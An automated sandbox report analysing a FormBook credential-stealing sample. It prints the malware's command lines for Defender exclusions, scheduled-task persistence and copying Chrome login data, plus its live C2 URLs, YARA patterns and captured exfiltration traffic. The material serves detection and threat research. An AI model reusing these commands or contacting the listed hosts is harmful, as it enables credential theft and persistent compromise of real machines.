Windows Analysis Report
SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe

Overview

General Information

Sample Name:SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe
Analysis ID:1276619
MD5:d72c3bb3172d13ac1cfc172c389e52e5
SHA1:a0bf2dc6ba08e4702098576b8e91f08c91a201ca
SHA256:2b7c90f224a3f2964f56820652ae35673cb830d152dc2203ec1629f69b8f5a00
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Detected FormBook malware
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Sigma detected: Steal Google chrome login data
System process connects to network (likely due to code injection or exploit)
Sigma detected: Scheduled temp file as task from temp location
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Modifies the prolog of user mode functions (user mode inline hooks)
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Adds a directory exclusion to Windows Defender
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe (PID: 6908 cmdline: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe MD5: D72C3BB3172D13AC1CFC172C389E52E5)
    • powershell.exe (PID: 6968 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 7004 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hkkRsa.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 3096 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hkkRsa" /XML "C:\Users\user\AppData\Local\Temp\tmpE41B.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 1648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • hkkRsa.exe (PID: 5396 cmdline: C:\Users\user\AppData\Roaming\hkkRsa.exe MD5: D72C3BB3172D13AC1CFC172C389E52E5)
    • schtasks.exe (PID: 3388 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hkkRsa" /XML "C:\Users\user\AppData\Local\Temp\tmp22F9.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 60 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • hkkRsa.exe (PID: 6664 cmdline: C:\Users\user\AppData\Roaming\hkkRsa.exe MD5: D72C3BB3172D13AC1CFC172C389E52E5)
      • explorer.exe (PID: 3324 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • rundll32.exe (PID: 6192 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • cmd.exe (PID: 6452 cmdline: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
{"C2 list": ["www.mattewigs.com/co63/"], "decoy": ["detectiveadda.com", "codewm.com", "leeinvesting919.com", "dzaiwn.com", "winecountrywicked.com", "floraldesignsofhastings.com", "saleschildcarriers.com", "kanspersky.com", "mondlyfor.com", "takealicense.com", "aclarkemcgee.com", "riohandmadewithlove.com", "petalumadumpsterrental.com", "stanislavp.com", "mansakesalive.com", "ballthingsez.com", "iongraph.com", "pidesimple.com", "nutritioncalculate.com", "dulichphucbinh.com", "myccsmartmove.com", "infinitenegocios.com", "theatlantainvestoragent.com", "globussgroup.com", "v8ks.com", "salesshoulderpads.com", "freepad168.com", "zgs72.com", "48a47.com", "creativebrea.com", "inf9obase.com", "sehatorthocare.com", "vestostore.com", "girlspooppingtube.com", "tesoroimports.com", "pym479.com", "starlight-edugrp.com", "oleegmedia.com", "rachellebags.com", "f1-austin-tickets.com", "flinterview.com", "naspewt.xyz", "watordropfilter.com", "choppercitypowersports.com", "mazinhoccb.com", "sanantonionailsalon.com", "dlafluid.com", "localhomegurus.com", "shredthepowpow.com", "myboothtemplates.com", "comprec.net", "mespareparts.com", "zenhandsoaps.com", "blynnbundleswigs.com", "joineryxx.com", "cucinainvenice.com", "hzhomeimprovements.com", "kalmiamedia.com", "kuise-east-sakae.com", "mycomopolitantitle.com", "illusionscore.com", "attractyourlifestyle.com", "isicapp.com", "pestcontrolgloves.com"]}
Source | Rule | Description | Author | Strings
0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
    0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cbe0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b937:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c94a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
      • 0x18859:$sqlite3step: 68 34 1C 7B E1
      • 0x1896c:$sqlite3step: 68 34 1C 7B E1
      • 0x18888:$sqlite3text: 68 38 2A 90 C5
      • 0x189ad:$sqlite3text: 68 38 2A 90 C5
      • 0x1889b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x189c3:$sqlite3blob: 68 53 D8 7F 8C
      Source | Rule | Description | Author | Strings
        10.2.SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
          10.2.SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          10.2.SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
          • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1bde0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          10.2.SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          10.2.SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
          • 0x17a59:$sqlite3step: 68 34 1C 7B E1
          • 0x17b6c:$sqlite3step: 68 34 1C 7B E1
          • 0x17a88:$sqlite3text: 68 38 2A 90 C5
          • 0x17bad:$sqlite3text: 68 38 2A 90 C5
          • 0x17a9b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17bc3:$sqlite3blob: 68 53 D8 7F 8C

          Persistence and Installation Behavior

          Source: Process started Author: Joe Security: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hkkRsa" /XML "C:\Users\user\AppData\Local\Temp\tmpE41B.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hkkRsa" /XML "C:\Users\user\AppData\Local\Temp\tmpE41B.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, ParentProcessId: 6908, ParentProcessName: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hkkRsa" /XML "C:\Users\user\AppData\Local\Temp\tmpE41B.tmp, ProcessId: 3096, ProcessName: schtasks.exe

          Stealing of Sensitive Information

          Source: Process started Author: Joe Security: Data: Command: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V, CommandLine: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\rundll32.exe, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 6192, ParentProcessName: rundll32.exe, ProcessCommandLine: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V, ProcessId: 6452, ProcessName: cmd.exe
          Timestamp:07/20/23-11:46:57.367343
          Source IP:192.168.2.5
          Destination IP:23.227.38.74
          SID:2031412
          Source Port:49731
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          AV Detection

          Source: 0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmp Malware Configuration Extractor: FormBook
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe ReversingLabs: Detection: 23%
          Source: Yara match File source: 10.2.SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 10.2.SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000010.00000002.911001855.0000000000E70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000010.00000002.911590172.0000000004B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000010.00000002.911556119.0000000004B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000002.435031678.0000000003EA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: http://www.mattewigs.com/co63/?aJElwV=3AiLeGuBi37RfNw9iEe1gED9S58L9D44LalDhi66HjPelwFncooMVS2PHplI6kLySndc&lz=9rXXjDMXIb6HXH- Avira URL Cloud: Label: malware
          Source: http://www.mattewigs.com/co63/ Avira URL Cloud: Label: malware
          Source: http://www.mattewigs.com/co63/www.dulichphucbinh.com Avira URL Cloud: Label: malware
          Source: http://www.naspewt.xyz/co63/www.mattewigs.com Avira URL Cloud: Label: phishing
          Source: http://www.naspewt.xyz/co63/ Avira URL Cloud: Label: phishing
          Source: www.mattewigs.com/co63/ Avira URL Cloud: Label: malware
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exe ReversingLabs: Detection: 23%
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Joe Sandbox ML: detected
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exe Joe Sandbox ML: detected
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdbeex.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 source: explorer.exe, 0000000F.00000000.477862889.00007FFA13021000.00000020.00000001.01000000.0000000B.sdmp
          Source: Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdb source: explorer.exe, 0000000F.00000000.477862889.00007FFA13021000.00000020.00000001.01000000.0000000B.sdmp
          Source: Binary string: wntdll.pdbUGP source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 0000000A.00000003.427644663.0000000001622000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 0000000A.00000003.424015597.0000000001483000.00000004.00000020.00020000.00000000.sdmp, hkkRsa.exe, 0000000E.00000002.487071109.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.911668789.0000000004CA0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.486692282.000000000496F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.911668789.0000000004DBF000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 0000000A.00000003.427644663.0000000001622000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 0000000A.00000003.424015597.0000000001483000.00000004.00000020.00020000.00000000.sdmp, hkkRsa.exe, 0000000E.00000002.487071109.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.911668789.0000000004CA0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.486692282.000000000496F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.911668789.0000000004DBF000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdb source: hkkRsa.exe, 0000000E.00000002.486732177.0000000000B89000.00000004.00000020.00020000.00000000.sdmp, hkkRsa.exe, 0000000E.00000002.489051209.0000000002BE0000.00000040.10000000.00040000.00000000.sdmp, rundll32.exe, 00000010.00000002.911333276.0000000001330000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: fOac.pdbSHA256 source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000000.385827333.0000000000982000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000010.00000002.911442424.0000000004A68000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdbGCTL source: hkkRsa.exe, 0000000E.00000002.486732177.0000000000B89000.00000004.00000020.00020000.00000000.sdmp, hkkRsa.exe, 0000000E.00000002.489051209.0000000002BE0000.00000040.10000000.00040000.00000000.sdmp, rundll32.exe, 00000010.00000002.911333276.0000000001330000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: fOac.pdb source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000000.385827333.0000000000982000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000010.00000002.911442424.0000000004A68000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: eex.pdb source: explorer.exe, 0000000F.00000000.477862889.00007FFA13021000.00000020.00000001.01000000.0000000B.sdmp
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 4x nop then pop ebx 10_2_00407B1A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 4x nop then pop esi 10_2_00417331

          Networking

          Source: C:\Windows\explorer.exe Domain query: www.naspewt.xyz
          Source: C:\Windows\explorer.exe Network Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exe Domain query: www.mattewigs.com
          Source: C:\Windows\explorer.exe Network Connect: 172.67.215.254 80
          Source: C:\Windows\explorer.exe Domain query: www.vestostore.com
          Source: C:\Windows\explorer.exe Domain query: www.ballthingsez.com
          Source: C:\Windows\explorer.exe Network Connect: 76.223.26.96 80
          Source: C:\Windows\explorer.exe Network Connect: 184.94.215.140 80
          Source: C:\Windows\explorer.exe Network Connect: 152.199.21.175 80
          Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exe Network Connect: 34.149.87.45 80
          Source: C:\Windows\explorer.exe Domain query: www.saleschildcarriers.com
          Source: C:\Windows\explorer.exe Domain query: www.myccsmartmove.com
          Source: C:\Windows\explorer.exe Domain query: www.takealicense.com
          Source: C:\Windows\explorer.exe Network Connect: 86.38.202.187 80
          Source: C:\Windows\explorer.exe Domain query: www.dlafluid.com
          Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49731 -> 23.227.38.74:80
          Source: C:\Windows\explorer.exe DNS query: www.naspewt.xyz
          Source: Malware configuration extractor URLs: www.mattewigs.com/co63/
          Source: global traffic HTTP traffic detected: GET /co63/?aJElwV=+eMjGIULdB7b+FjbEEC2CFnAZBB7ZIs3DDH5LmXZiTUQNAaNvk9FU6ysQ2HcgTeGr7Jo&lz=9rXXjDMXIb6HXH- HTTP/1.1 Host: www.vestostore.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected: GET /co63/?aJElwV=gtjAeIS6VJWpMIOvAorICaUf7+ed7+VEBFwjlL0fBy8QswGl2t9TVUNzPjmUB+tmUyAO&lz=9rXXjDMXIb6HXH- HTTP/1.1 Host: www.saleschildcarriers.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected: GET /co63/?aJElwV=dh5wnP7Ug0+YjaaSPNPjWLPMAAuifa570LEC5RUEdgVY9PwZv9hNJ3RIsZJs9uSwpSOZ&lz=9rXXjDMXIb6HXH- HTTP/1.1 Host: www.ballthingsez.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected: GET /co63/?aJElwV=7844uNirl1OmKo/iz3P/xC/n+TlWcrf11+et7B27/2a6MTbhGvfvyecJXVPFAq5Jbxq/&lz=9rXXjDMXIb6HXH- HTTP/1.1 Host: www.dlafluid.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected: GET /co63/?aJElwV=McyR/z78/oMNrvlFuqxD/V8JfWPC4TTnrx7QyB/aq5OEZJfdbD3j+IdLq+ssY6HN52vi&lz=9rXXjDMXIb6HXH- HTTP/1.1 Host: www.myccsmartmove.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected: GET /co63/?aJElwV=C9mZAu2amj0/7xzN/ZGYFZ9Os9Pxtlf2WxsFucW+74+VhIoIvzmW589U18pQtRovant4&lz=9rXXjDMXIb6HXH- HTTP/1.1 Host: www.takealicense.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected: GET /co63/?aJElwV=3AiLeGuBi37RfNw9iEe1gED9S58L9D44LalDhi66HjPelwFncooMVS2PHplI6kLySndc&lz=9rXXjDMXIb6HXH- HTTP/1.1 Host: www.mattewigs.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox View IP Address: 76.223.26.96 76.223.26.96
          Source: global trafficHTTP traffic detected: POST /co63/ HTTP/1.1Host: www.vestostore.comConnection: closeContent-Length: 1484Cache-Control: no-cacheOrigin: http://www.vestostore.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.vestostore.com/co63/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 61 4a 45 6c 77 56 3d 32 38 41 5a 59 73 77 35 63 54 4c 46 6c 6c 7e 72 63 52 6a 69 53 52 72 50 52 52 64 4c 4f 4b 68 33 59 31 47 67 56 6d 7a 76 79 42 34 68 63 52 69 68 6d 56 30 6d 52 74 37 30 47 41 76 6d 76 78 75 31 7a 38 59 68 77 37 42 48 6f 36 4e 4d 71 71 6a 34 71 35 50 61 53 73 72 71 76 5a 71 63 62 68 54 39 34 6b 59 70 6f 4c 28 6c 35 7a 4b 46 33 35 63 6f 52 61 41 44 30 46 35 75 4c 4a 66 71 28 6c 48 53 63 54 56 70 36 74 69 56 6d 43 54 33 67 38 33 54 35 36 58 6b 64 38 62 50 57 70 78 72 66 59 76 5a 6c 61 74 67 4c 66 32 50 41 4f 38 39 63 67 32 51 4a 63 4c 5a 57 57 72 2d 59 6f 28 41 6a 78 4d 70 75 79 65 50 6e 41 5a 4c 63 46 54 49 45 6f 4d 32 28 68 77 37 6b 69 69 6b 49 6d 71 79 53 75 4a 35 79 30 71 46 37 4d 6d 6b 7a 62 4c 55 65 6f 70 46 68 79 6b 7a 28 34 66 7a 6c 4b 51 30 35 55 4e 39 61 69 79 64 5a 4d 68 48 30 4e 68 5a 45 6d 56 34 31 5a 61 70 71 42 5a 6c 47 69 67 4e 78 52 69 6d 30 71 78 7a 42 57 74 57 41 52 73 48 74 38 75 73 6d 30 52 33 68 58 53 57 75 42 6f 5a 70 50 61 72 6b 4c 77 75 55 54 6a 6d 6f 47 59 77 4d 72 75 50 35 4a 33 35 4e 71 68 47 7e 31 32 62 58 6d 46 6f 35 56 52 54 65 37 67 43 59 69 70 66 53 63 33 35 37 54 6c 7a 42 34 35 55 58 2d 4f 4d 7a 6a 33 49 28 63 62 55 61 72 55 77 76 73 66 72 41 62 33 79 73 79 34 72 77 2d 70 61 37 72 6b 5a 71 63 62 42 4e 4d 45 32 6b 71 73 6e 55 66 6f 74 6a 69 64 39 50 43 67 6f 45 30 38 5a 36 79 4b 6e 45 6d 76 4a 62 5f 6c 59 46 68 57 53 4d 6c 48 45 6f 34 79 2d 28 51 6d 59 43 4b 4d 4a 45 32 4c 46 5a 77 65 63 4e 6f 6a 76 33 43 43 70 68 54 38 79 4c 59 56 57 67 70 49 55 54 4b 32 53 33 34 69 37 6f 48 50 6f 42 
34 73 4a 46 58 76 4c 51 6f 34 63 41 5a 76 77 6c 63 44 48 64 67 36 62 43 59 51 44 67 37 6d 6f 6e 66 33 54 46 6e 79 56 7a 56 28 79 38 7a 59 79 6a 73 6d 77 6b 7a 32 5a 72 56 34 49 30 39 79 4b 69 53 5a 68 62 74 43 57 61 48 43 36 61 50 5a 77 54 6d 70 51 42 75 37 58 66 74 28 39 55 31 4f 68 73 71 70 5a 67 7a 5a 43 50 4a 33 39 42 36 34 4d 43 6d 69 58 62 38 69 64 53 31 64 67 36 68 64 79 42 30 6f 32 7e 6e 5a 5f 56 47 64 74 50 37 57 62 33 69 67 47 34 50 38 53 59 6d 34 53 47 46 32 42 35 4c 47 58 65 6b 49 58 78 41 37 37 5a 63 30 42 71 50 31 58 6f 66 34 63 36 33 70 4e 68 59 43 76 38 62 34 62 36 61 6b 58 67 2d 51 6a 74 31 6b 55 4b 73 58 74 75 36 51 45 65 61 36 6f 79 6f 46 47 66 6a 28 45 47 56 68 6a 4a 74 32 46 31 69 41 6e 47 39 6b 73 69 35 33 7a 69 43 37 4b 61 48 7a 47 7a 69 78 54 62 38 42 4f 6b 53 32 76 74 30 4e 34 46 71 6a 36 78 65 51 49 61 4c 4d 6a 4e 33 57 36 51 43 6c 4f 6c 56 44 47 68 62 39 49 69 4f 4a 4e 59 32 49 76 6e 6d 34 78 28 72 44 38 35 45 70 42 56 77 4f 46 78 4a 4b 6b 6d 6a 39 35 68 7a 4a 64 4a 69 56 51 32 79 5a 62 59 4
          Source: global trafficHTTP traffic detected: POST /co63/ HTTP/1.1Host: www.vestostore.comConnection: closeContent-Length: 151296Cache-Control: no-cacheOrigin: http://www.vestostore.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.vestostore.com/co63/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 61 4a 45 6c 77 56 3d 32 38 41 5a 59 73 45 74 65 6a 66 59 76 33 71 75 52 44 61 76 57 78 33 52 5a 78 78 61 51 6f 67 46 56 47 7e 47 56 6d 6a 6a 72 77 6f 7a 4e 67 53 68 67 58 73 74 59 74 37 7a 4f 67 76 6c 72 78 69 4e 36 4c 45 36 77 36 31 74 6f 36 46 4c 72 37 7a 48 69 37 32 43 4f 70 7a 53 33 70 75 4f 66 6b 50 2d 28 48 6b 74 74 4f 44 6c 32 6a 75 55 79 72 31 30 58 2d 6f 31 79 56 6c 77 41 74 48 68 32 7a 48 61 63 31 4e 74 79 4a 75 39 33 53 61 31 72 2d 66 37 34 63 44 53 51 73 50 4d 64 4f 35 68 66 5f 28 6e 69 62 74 34 58 76 76 4c 4b 71 6f 6a 5a 79 28 76 4a 64 66 73 43 6e 61 4b 51 50 69 30 28 53 6b 54 35 41 79 50 6c 78 67 4f 62 32 62 4f 42 72 6f 2d 39 77 78 4c 7a 69 54 76 42 47 37 36 49 71 46 30 38 53 58 41 68 64 7a 63 28 5f 33 51 55 66 